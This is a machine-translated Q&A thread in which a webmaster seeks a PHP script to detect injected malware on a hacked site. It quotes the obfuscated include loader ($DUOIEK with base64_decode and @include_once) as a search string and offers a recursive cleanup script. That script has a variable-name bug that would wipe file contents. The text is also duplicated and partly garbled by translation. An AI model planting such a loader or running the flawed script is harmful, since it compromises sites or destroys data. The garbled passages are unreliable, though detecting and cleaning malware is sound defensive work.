Php Code可在目录和子目录中的任何文件中搜索特定代码_Php_Malware_Malware Detection

Php Code可在目录和子目录中的任何文件中搜索特定代码

php

Php Code可在目录和子目录中的任何文件中搜索特定代码,php,malware,malware-detection,Php,Malware,Malware Detection,好的，我对php非常陌生，但我知道它可以读取目录和文件我一直在与我们的一个网站上的恶意软件问题作斗争，我需要写一个脚本在我的主机空间中搜索它黑客在文件中输入的代码是 */$DUOIEK=base64\u解码(2.2-HVBBWWWWBWWWBWWBWWWWWWWWWWWWWWWWWWWWBBWWWWWWWBBBBBWWWWWWWWWWWWBBBBWWWWWWBBBBWWWWWWWWWWWWZZZZZLLLLLLLZZZZVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV

好的，我对php非常陌生，但我知道它可以读取目录和文件

我一直在与我们的一个网站上的恶意软件问题作斗争，我需要写一个脚本在我的主机空间中搜索它

黑客在文件中输入的代码是


*/$DUOIEK=base64\u解码(2.2-HVBBWWWWBWWWBWWBWWWWWWWWWWWWWWWWWWWWBBWWWWWWWBBBBBWWWWWWWWWWWWBBBBWWWWWWBBBBWWWWWWWWWWWWZZZZZLLLLLLLZZZZVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVBBBBBBBBBBBBBBBBBVVVVVVVVVVVVVVVVVVVVVVVBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBrlby5waha=“）；@包括一次$DUOIEK；/**？>

我不知道这是什么，但谷歌阻止我的网站时，这显示

我必须下载所有文件，然后在dreamweaver中搜索，用空格替换这些垃圾并放回原处

我需要一个脚本来检测之前，谷歌这样做

如果有人能给我一些建议，那就太好了

我相信这是每个人现在或以后都会面临的问题。

使用FTP下载所有内容并运行完整目录的查找和替换（dreamweaver支持完整目录）。我也曾经遇到过这个问题，您可能也想在代码中查找javascript黑客，他们也倾向于使用javascript

黑客代码试图包含此文件：

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

这是什么？我不知道，但这正是它想要做的。所以你可以认为这个黑客是从你托管的服务器内部完成的。我想，

< P>下载你的FTP并运行一个完整目录的查找和替换（Dreamweaver支持完整目录）。我也曾经遇到过这个问题，你可能也想在你的代码中寻找javascript黑客，他们也倾向于使用javascript

黑客代码试图包含此文件：

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

这是什么？我不知道，但这正是它想要做的。所以你可以认为这个黑客是从你托管的服务器内部完成的。我想，

< P>如果你有SSH访问，你可以使用一个命令，比如用“Base64译码”替换EVAL（BASE464解码）。如果没有，您将希望编写一个脚本，使用递归循环遍历所有文件，然后使用一些魔法来检测“base64_解码”

如果你真的有问题，我会推荐第三方服务，比如

祝您好运！

如果您有SSH访问权限，您可以使用类似于将“eval（base64_decode）”替换为“base64_decode”的命令

如果没有，您将希望编写一个脚本，使用递归循环遍历所有文件，然后使用一些魔法来检测“base64_解码”

如果你真的有问题，我会推荐第三方服务，比如

祝您好运！

纯PHP解决方案，它将查找并替换您提供的字符串。或者，您可以只获取已修改的文件。注意：如果您使用此代码，则有无撤消选项，您使用此代码的风险自负

$dir = '/your_dir/';
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>'

$iterator = new RecursiveDirectoryIterator($dir);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur) 
{
    // Search and replace

    $contents = file_get_contents($filename);   
    $contents = str_replace($searchstring, ' ', $content);  
    file_put_contents($filename, $contents);

    // Alternatively, you can do this (instead of search and replace)

    if(strpos($contents, $searchstring) !== false)
    {
        $infected[] = $filename; // gives you an array that gives you paths to files that contain the injected code.
    }
}

您可以从浏览器或命令行运行脚本。我并不是说这是最好的选择。

纯PHP解决方案将查找并替换您提供的字符串。或者，您可以只获取已修改的文件。注意：如果您使用此代码，则有无撤消选项，您使用此代码的风险自负

$dir = '/your_dir/';
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>'

$iterator = new RecursiveDirectoryIterator($dir);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur) 
{
    // Search and replace

    $contents = file_get_contents($filename);   
    $contents = str_replace($searchstring, ' ', $content);  
    file_put_contents($filename, $contents);

    // Alternatively, you can do this (instead of search and replace)

    if(strpos($contents, $searchstring) !== false)
    {
        $infected[] = $filename; // gives you an array that gives you paths to files that contain the injected code.
    }
}

你可以从浏览器或命令行运行脚本。我不是说这是最好的选择。

在一个单独的文件echo base上解码$DUOIEK，看看他们试图做什么…尝试确保这种情况不再发生，我也遇到过这种恶意软件..这是由于FTP客户端（cuteFTP）我正在使用它。我在其中保存了密码。每当我连接到服务器时，它都会在所有index.php文件中添加这段代码。因此，请更改您的密码，并清理您的系统。我也经历过这种情况，很可能是因为osCommerce中的文件管理器。在一个单独的文件上，echo base decode$DUOIEK，以查看他们试图做什么建议n、 …尝试确保这种情况不再发生，我也遇到过这种恶意软件..这是由于FTP客户端（cuteFTP）我正在使用它。我在其中保存了密码。每当我连接到服务器时，它都会在所有index.php文件中添加这段代码。因此，请更改您的密码，并清理您的系统。我也经历过这种情况，很可能是因为osCommerce中的文件管理器。是的，我转换了基本代码，发现该文件打开了一个重定向列表类似垃圾邮件搜索页面的东西。我正在删除整个medcourtBackupoct文件，然后将尝试上面的脚本。我已经完成了下载并替换了至少3倍于5 GB主机的东西，我必须清理每个文件一个月后它会回来。这个文件可能是它的原因。文件夹中还有2个文件。谢谢我转换了基本代码并发现了这个文件。该文件正在打开一个重定向列表，类似垃圾邮件搜索页面。我正在删除整个medcourtBackupoct文件，然后将尝试上面的脚本。我已经下载并更换了至少3次5 GB的主机，并且我必须在一个月内清理所有它返回的内容。这个文件可能是原因。文件夹中还有2个文件。谢谢这确实让我上了钻机ht跟踪。我尝试安装第三方服务，如site lock，但这是rediculus，他们要求20美元来清理1个文件。只有真正愚蠢的人才会支付这么多。是的，这确实让我走上了正确的轨道。我尝试安装第三方服务，如site lock，但他们要求的是rediculus